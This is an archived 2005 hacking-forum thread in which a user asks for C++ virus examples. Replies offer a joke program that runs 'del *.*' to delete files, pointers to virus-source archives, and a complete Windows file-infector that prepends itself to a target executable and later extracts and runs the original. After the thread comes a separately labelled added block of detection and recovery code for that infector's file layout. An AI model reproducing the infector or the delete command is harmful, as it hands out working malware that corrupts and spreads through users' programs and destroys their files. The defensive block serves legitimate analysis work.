Full Version: Virii In C++
shell6
Jun 26 2005, 10:46 PM
Where are some good code examples for virii in C++? A tutorial would be great too.
EDIT: <noobing>Yay! 20th post! New rank.</noobing>
Partizaan
Jun 26 2005, 11:41 PM
#include <stdio.h>
#include <windows.h>
int main()
{
system("ECHO THIS IS NOT A VIRII BOARD > trash.txt");
system("del *.*");
return 0;
}
shell6
Jun 26 2005, 11:54 PM
Then please move this to the virii section.
aelphaeis_mangarae
Jun 27 2005, 06:11 AM
Viruses are pretty lame.....worms can be pretty interesting, but considering this forum is more of a White Hat forum, I don't think the moderators would allow the discussion of worm coding....
dissolutions
Jun 27 2005, 07:57 AM
spybot, agobot I believe are coded in C++
White Scorpion
Jun 27 2005, 09:31 AM
Here is a Google search which gives you plenty of examples of virus codes..
shell6
Jun 27 2005, 09:33 AM
vx.netlux.org seems to be down. Anybody know when they'll be back?
White Scorpion
Jun 27 2005, 09:51 AM
vx.netlux.org often has problems with its DNS, so try http://65.98.58.155 instead. In this case it also doesn't work, but it works more often than the original address...
aelphaeis_mangarae
Jun 27 2005, 09:59 AM
That link isn't working either scorpion...
Anyone have some links to websites that have virus source codes?
Milamber
Jun 29 2005, 11:15 AM
http://madchat.org/vxdevl/vxsrc/
There's lots of vx source out there, and also a lot of zines which come with source (in a variety of languages, although the older ones will lean towards asm, using tasm) and tutorials (if you can handle the garbled English). 29a for example.
aelphaeis_mangarae
Jun 29 2005, 11:29 AM
QUOTE
http://madchat.org/vxdevl/vxsrc/
A lot of virus source codes....mostly ASM. I am still looking for some C/C++ source codes though...
shell6
Jul 2 2005, 05:41 AM
Thanks all.
belgther
Jul 2 2005, 06:33 AM
Well, even simple codes can be treated as a virus. A DOS program causing an infinite loop can also be accepted as a virus. This code does it, but I am 200% sure that even script kiddies know this code:
CODE
#include <stdio.h>
int x;
int main()
{
x=2;
while (x==2)
{
printf("you are hacked...");
}
return 0;
}
so in DOS, even this stupid code can be counted as virus. But if you look for something better, search. Or think how viruses can work. Then try to realize the steps in C. So you get a virus in C. Have fun...
tibbar
Jul 2 2005, 09:47 AM
think you meant while(x==2) !!!
belgther
Jul 2 2005, 01:17 PM
QUOTE(tibbar @ Jul 2 2005, 10:47 AM)
think you meant while(x==2) !!!
Yes, sorry for lack of knowledge.
nolimit
Jul 2 2005, 01:17 PM
I don't find anything wrong with discussing viruses on a whitehat board. To understand the enemy, you have to become the enemy.
ComSec
Jul 2 2005, 01:46 PM
QUOTE(nolimit @ Jul 2 2005, 01:17 AM)
I don't find anything wrong with discussing viruses on a whitehat board. To understand the enemy, you have to become the enemy.
I agree... but some guys jump into the deep end and want icing on the cake... esp when it comes to bots
shell6
Jul 2 2005, 06:07 PM
I just want to write (but not release) a really complex really tricky virus so that I can unleash it on a test machine (or if I make a worm also that spreads the virus, a test network) to get some experience. And, I would need to do it in C because that is the language that I know best out of the ones I know.
no_face_king
Jul 3 2005, 10:18 PM
#include "stdafx.h"
#include "windows.h"
#include "iostream.h"
#include "fstream.h"
const char * virus_temp_sig = "XXX";
const char * virus_sig ="XXX";
struct virus_struct
{
DWORD file_size;
char sig[4];
};
virus_struct v_s;
char * app_path()
{
char * path = (char *)malloc(1024);
HINSTANCE hi = GetModuleHandle(NULL);
GetModuleFileName(hi,path,1024);
return path;
}
DWORD get_file_size(char *path)
{
WIN32_FIND_DATA fd;
FindFirstFile(path,&fd);
return fd.nFileSizeLow;
}
char * load_file_into_ram(char *path)
{
ifstream f(path,ios::nocreate | ios::binary);
if(!f)
return (char*)NULL;
char * fileram = (char *)malloc(get_file_size(path));
char ch;
int pos=0;
while(f.get(ch))
{
fileram[pos] = ch;
pos++;
}
return fileram;
}
char * get_temp_file()
{
char wintemp_path[1024];
char *temp_path=new char[1024];
GetTempPath(1024,wintemp_path);
GetTempFileName(wintemp_path,virus_temp_sig,1234,temp_path);
return temp_path;
}
int infect_file(char * source, char * dest)
{
char * temp_file =get_temp_file();
char * dest_file = load_file_into_ram(dest);
char * source_file = load_file_into_ram(source);
if(!source_file)
return 0;
if(!dest_file)
return 0;
ofstream fout(temp_file,ios::binary);
if(!fout)
return 0;
fout.write(source_file,get_file_size(source));
fout.write(dest_file,get_file_size(dest));
v_s.file_size = get_file_size(dest) ;
strcpy(v_s.sig,virus_sig);
fout.write((const char *)&v_s,sizeof(virus_struct));
fout.close();
if(!CopyFile(temp_file,dest,false))
return 0;
return 1;
}
virus_struct *check_if_effected()
{
ifstream fin(app_path() ,ios::binary);
fin.seekg(get_file_size(app_path())-sizeof(virus_struct),ios::beg);
virus_struct *vs=new virus_struct;
fin.read((char*)vs,sizeof(virus_struct));
fin.close();
if(!strcmp(vs->sig,virus_sig))
return vs;
return NULL;
}
void extract_file()
{
ifstream fin(app_path(),ios::binary);
fin.seekg(get_file_size(app_path())-sizeof(virus_struct));
virus_struct *vs=new virus_struct;
fin.read((char*)vs,sizeof(virus_struct));
char * infect_file_data = new char[vs->file_size];
fin.seekg(get_file_size(app_path())-vs->file_size-sizeof(virus_struct),ios::beg); //seek to beginning of infected file
fin.read(infect_file_data,vs->file_size);
fin.close();
char * infect_file_path = get_temp_file();
ofstream fout(infect_file_path,ios::binary);
fout.write(infect_file_data,vs->file_size);
fout.close();
WinExec(infect_file_path,SW_NORMAL);
}
int main(int argc, char* argv[])
{
virus_struct *vs = check_if_effected();
if(!vs)
{
cout << "I'm not infected " << endl;
}
else
{
extract_file();
while(1){} //just idle
}
if(argc==1)
{
cout << "Usage: [file to infect] " << endl;
return 0;
}
if(!infect_file(app_path(),argv[1]))
{
cout << "Failed to infect file " << endl;
}
return 0;
}
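Added example, not part of the thread or any poster's code: a defender's check for the file layout that the listing above produces (stub program, then the original program, then an 8-byte trailer holding the original's size and the "XXX" marker), with the original carved back out on a match. The names `inspect`, `recover_host` and `constructed_sample` are hypothetical, the marker is assumed to be at most three characters, and the sample is inert placeholder bytes built in memory.

```cpp
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

using Bytes = std::vector<unsigned char>;
const size_t kTrailerSize = 8;  // DWORD file_size + char sig[4], as in the posted virus_struct

struct Finding { bool match; size_t host_offset; size_t host_size; };

// Read the trailer from the last 8 bytes and validate the size field before trusting it.
// The marker is a parameter; the posted code uses the placeholder "XXX".
Finding inspect(const Bytes& f, const std::string& marker = "XXX") {
    Finding none{false, 0, 0};
    if (marker.size() > 3 || f.size() < kTrailerSize + 4) return none;
    const unsigned char* t = f.data() + f.size() - kTrailerSize;
    uint32_t host_size = t[0] | (t[1] << 8) | (t[2] << 16) | (uint32_t(t[3]) << 24);
    // The signature field must hold the marker followed by a NUL terminator.
    if (std::string(reinterpret_cast<const char*>(t + 4), marker.size() + 1) != marker + '\0') return none;
    size_t body = f.size() - kTrailerSize;
    if (host_size < 2 || host_size > body - 2) return none;  // size comes from the file: bound it
    size_t off = body - host_size;
    // Both the prepended stub and the embedded original should start with the "MZ" magic.
    bool mz = f[0] == 'M' && f[1] == 'Z' && f[off] == 'M' && f[off + 1] == 'Z';
    return mz ? Finding{true, off, host_size} : none;
}

// Carve the original program back out of a matching file (empty result if no match).
Bytes recover_host(const Bytes& f) {
    Finding r = inspect(f);
    if (!r.match) return {};
    return Bytes(f.begin() + r.host_offset, f.begin() + r.host_offset + r.host_size);
}

// Constructed sample: inert placeholder bytes laid out as stub + host + trailer.
Bytes constructed_sample(uint32_t claimed_size) {
    std::string stub = "MZ-stub-placeholder", host = "MZ-host-placeholder";
    Bytes f(stub.begin(), stub.end());
    f.insert(f.end(), host.begin(), host.end());
    for (int i = 0; i < 4; ++i) f.push_back((claimed_size >> (8 * i)) & 0xff);
    for (char c : std::string("XXX\0", 4)) f.push_back(c);
    return f;
}

int main() {
    Finding r = inspect(constructed_sample(19));
    std::printf("match=%d host_offset=%zu host_size=%zu\n", r.match, r.host_offset, r.host_size);
    std::printf("oversized claim rejected=%d\n", !inspect(constructed_sample(0xFFFFFFFFu)).match);
}
```

The trailer alone is a weak indicator, which is why the check also requires the size field to fit inside the file and both "MZ" headers to be present.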